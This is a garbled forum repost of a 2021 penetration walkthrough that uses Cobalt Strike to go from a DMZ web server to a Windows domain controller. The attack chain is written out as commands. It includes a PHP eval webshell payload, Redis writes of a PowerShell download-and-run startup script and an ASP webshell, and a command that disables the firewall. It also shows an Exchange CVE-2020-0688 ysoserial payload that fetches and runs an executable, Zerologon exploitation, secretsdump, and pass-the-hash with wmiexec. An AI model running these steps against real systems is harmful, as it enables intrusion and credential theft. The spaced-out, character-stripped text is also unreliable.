[26728] 2021-06-04_基于CobaltStrike的从外网打点到拿下域控

文档创建者:s7ckTeam
浏览次数:0
最后更新:2025-01-19
2021-06-04_基于CobaltStrike的从外网打点到拿下域控 C o b a l t   S t r i k e   R a i l g u n   m o o n s e c   2 0 2 1 - 0 6 - 0 4 #   , 1 8 #   , 9 #     , 2 1 C o b a l t   S t r i k e D M Z   W E B   S e r v e r w e b w e b . z i p M y s q l   R e s t   G e t s h e l l k s s _ t o o l r e s e t . p h p : v p s c o n f i g . p h p s h e l l
西 g e t s h e l l r e s e t . p h p : $ n s v r i d _ c o n f i g . p h p m c o 2 ( ) g e t s h e l l p a y l o a d : s h e l l - - - - - - W e b K i t F o r m B o u n d a r y Q g Y q B a l d c H D I O d b Z C o n t e n t - D i s ;   n a m e = " S E T S V R "     1 - - - - - - W e b K i t F o r m B o u n d a r y Q g Y q B a l d c H D I O d b Z   C o n t e n t - D i s ;   n a m e = " S V R I D "     1 ) ; @ e v a l ( $ _ P O S T [ R 2 S ] ) ; / / : B T   B y p a s s   D i s a b l e _ F u n c t i o n s w i n d o w s d i s a b l e f u n c t i o n s B T :
C : / B t S o f t / p a n e l / d a t a / d e f a u l e . d b , : C S   B y p a s s   H u o r o n g t a s k l i s t : k i l l : k : p o w e r s h e l l p a y l o a d p a y l o a d - w h i d d e n 线
线 便 h a s h R e d i s   S e r v e r 线 c s s o c k s 4 n e t v i e w n m a p : 1 9 2 . 1 6 8 . 5 9 . 4 , 8 0 6 3 7 9 W i n d o w s s e r v e r G e t s h e l l 访 m s f : C S 线 1 9 2 . 1 6 8 . 5 9 . 4 : 6 3 7 9 >   c o n f i g   s e t   d i r " C : / U s e r s / A d m i n i s t r a t o r / A p p D a t a / R o a m i n g / M i c r o s o f t / W i n d o w s / S t a r t M e n u / P r o g r a m s / s t a r t u p / "   O K   1 9 2 . 1 6 8 . 5 9 . 4 : 6 3 7 9 >   c o n f i g   s e t d b f i l e n a m e   s h e l l . b a t   O K   1 9 2 . 1 6 8 . 5 9 . 4 : 6 3 7 9 >   s e t   x " r n r n p o w e r s h e l l . e x e   - n o p   - w   h i d d e n   - c   " I E X ( ( n e w - o b j e c t n e t . w e b c l i e n t ) . d o w n l o a d s t r i n g ( ' h t t p : / / 1 9 2 . 1 6 8 . 5 9 . 1 3 3 : 8 2 3 4 / a ' ) ) " r n r n " O K   1 9 2 . 1 6 8 . 5 9 . 4 : 6 3 7 9 >   s a v e   O K s h e l l i i s : n ( i i s ) 5 0 0 1 9 2 . 1 6 8 . 5 9 . 4 : 6 3 7 9 >   c o n f i g   s e t   d i r C : i n e t p u b w w w r o o t   O K   1 9 2 . 1 6 8 . 5 9 . 4 : 6 3 7 9 >   c o n f i g   s e t   d b f i l e n a m e a . a s p   O K   1 9 2 . 1 6 8 . 5 9 . 4 : 6 3 7 9 >   s e t   x   " r n r n < % e v a l r e q u e s t ( " r a " ) % > r n r n "   O K   1 9 2 . 1 6 8 . 5 9 . 4 : 6 3 7 9 > s a v e   O K
A L L U S E R 西 s h e l l 线 p i n g D M Z D M Z N e t S h   A d v f i r e w a l l   s e t   a l l p r o f i l e s   s t a t e   o f f 线 P r i v i l e g e   E s c a l a t i o n - - 线 E x c h a n g e   S e r v e r c s s o c k e t s s o c k s 2 0 1 2 0 9 . : 2 0 1 :   4 9 1 1 5   1 3 9   8 0   4 4 5   1 3 5       2 0 9 :   6 0 0 6   5 9 3   9 9 5 2 5   1 1 0   5 8 7   1 3 5   1 3 9   8 0   4 4 3   4 4 5
4 4 5 8 0 I I S f o r b i d d e n 2 0 9 4 4 3 o u t l o o k C V E - 2 0 2 0 - 0 6 8 8 C V E - 2 0 2 1 - 2 6 8 5 7 r e d i s p s t : C V E - 2 0 2 0 - 0 6 8 8 C V E - 2 0 2 0 - 0 6 8 8 v i e w s t a t e u s e r k e y g e n e r a t o r - - v a l i d a t i o n k e y   = C B 2 7 2 1 A B D A F 8 E 9 D C 5 1 6 D 6 2 1 D 8 B 8 B F 1 3 A 2 C 9 E 8 6 8 9 A 2 5 3 0 3 B F     - - v a l i d a t i o n a l g   = S H A 1     - - g e n e r a t o r   = B 9 7 B 4 E 2 7     - - v i e w s t a t e u s e r k e y =   8 9 b 3 9 4 5 6 - 3 6 b 1 - 4 4 c e - b b 2 8 - e a 9 d 5 f f 2 d a 5 f p a y l o a d 使 y s o s e r i a l s h e l l w i n d o w s s h e l l s h e l l r e d i s p o w e r s h e l l 5 0 0 c s ( r e d i s i p C S L i s t e n e r 1 9 2 . 1 6 8 . 5 9 线 1 0 ) : p a y l o a d U R L 访 , < g e n e r a t o r >   < V i e w S t a t e >   : / e c p / d e f a u l t . a s p x ? _ _ V I E W S T A T E G E N E R A T O R = < g e n e r a t o r > & _ _ V I E W S T A T E = < V i e w S t a t e > 访 5 0 0 线 y s o s e r i a l . e x e   - p   V i e w S t a t e   - g T e x t F o r m a t t i n g R u n P r o p e r t i e s   - c   " c m d . e x e   / c   c e r t u t i l   - u r l c a c h e - s p l i t   - f   h t t p : / / 1 0 . 1 0 . 1 0 . 2 0 2 / b e . e x e   b . e x e   & &   b . e x e " - - v a l i d a t i o n a l g = " S H A 1 " - - v a l i d a t i o n k e y =
D C   S e r v e r 2 0 1 C V E - 2 0 2 0 - 1 4 7 2 C V E - 2 0 2 0 - 1 4 7 2 1 : 2 h a s h ( i m p a c k e t . e x a m p l e . u t i l s k e y t a ) : i m p a c k e t - m a s t e r / i m p a c k e t / e x a m p l e / u t i l s i m p a c k e t - m a s t e r / i m p a c k e t / e x a m p l e / k r b 5 : 3 s h e l l r e d i s 线 C S : S u m m a r y : 1 .   D M Z   W E B   S E R V E R B T B T 线 C S 2 .   R E D I S   S E R V E R I I S I I S w e b s h e l l 线 C S C S g e t s y s t e m p r o x y c h a i n s   c v e - 2 0 2 0 - 1 4 7 2 - e x p l o i t . p y 1 2 s e r v e r - d c $ ( d c   n a m e )   1 0 . 1 0 . 1 0 . 2 0 1 ( d c   i p )     p r o x y c h a i n s c v e - 2 0 2 0 - 1 4 7 2 - e x p l o i t . p y   1 2 s e r v e r - d c $   1 0 . 1 0 . 1 0 . 2 0 1 p r o x y c h a i n s   p y t h o n 3   s e c r e t s d u m p . p y c n c a t / 1 2 S E R V E R - D C $ @ 1 0 . 1 0 . 1 0 . 2 0 1 ( d c / d c   n a m e @ d c   i p $ )   - n o - p a s s       p r o x y c h a i n s   p y t h o n 3   s e c r e t s d u m p . p y X X X / 1 2 S E R V E R - D C $ @ 1 0 . 1 0 . 1 0 . 2 0 1   - n o - p a s s p y t h o n 3   w m i e x e c . p y   - h a s h e s a a d 3 b 4 3 5 b 5 1 4 0 4 e e a a d 3 b 4 3 5 b 5 1 4 0 4 e e : 4 2 e 2 6 5 6 e c 2 4 3 3 1 2 6 9 f 8 2 1 6 0 f f 5 9 6 2 3 8 7 ( a d m i n i s t r a t o r ' s h a s h e s )   X X X / a d m i n i s t r a t o r @ 1 0 . 1 0 . 1 0 . 2 0 1 ( d o m a i n / a d m i n i s t r a t o r @ d o m a i n i p
3 .   E X C H A N G E R E D I S   S E R V E R C V E - 2 0 2 0 - 0 6 8 8   R C E 4 .   D C   S E R V E R C V E - 2 0 2 0 - 1 4 7 2   N E T L O G O N : 1 .   C S 线 C S S O C K S N M A P 2 .   E X   R C E s h e l l R C E C S E X E 线 3 .   N E T L O G O N i m p o r t i m p o r t   f i l e n a m e 4 .   e x c h a n g e 5 .   C S I P L i s t e n e r
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则